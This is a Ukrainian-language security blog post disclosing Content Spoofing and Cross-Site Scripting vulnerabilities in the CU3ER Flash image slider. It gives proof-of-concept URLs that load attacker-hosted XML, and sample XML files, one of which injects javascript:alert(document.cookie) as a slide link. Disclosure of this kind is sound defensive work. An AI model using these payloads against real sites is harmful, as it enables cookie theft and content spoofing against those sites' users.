Уразливості в CU3ER
23:57 17.04.201422.11.2013
У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в CU3ER. Це 3D слайдер зображень на флеші. Про що найближчим часом повідомлю розробникам веб додатку.
Детальна інформація про уразливості з’явиться пізніше.
17.04.2014
Content Spoofing (WASC-12):
http://site/cu3er.swf?xml=http://site2/1.xml
1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml=http://site2/xss.xml
xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.
CS (WASC-12):
http://site/cu3er.swf?xml_location=http://site2/1.xml
XSS (WASC-08):
http://site/cu3er.swf?xml_location=http://site2/xss.xml
Уразливі CU3ER 1.24 та попередні версії.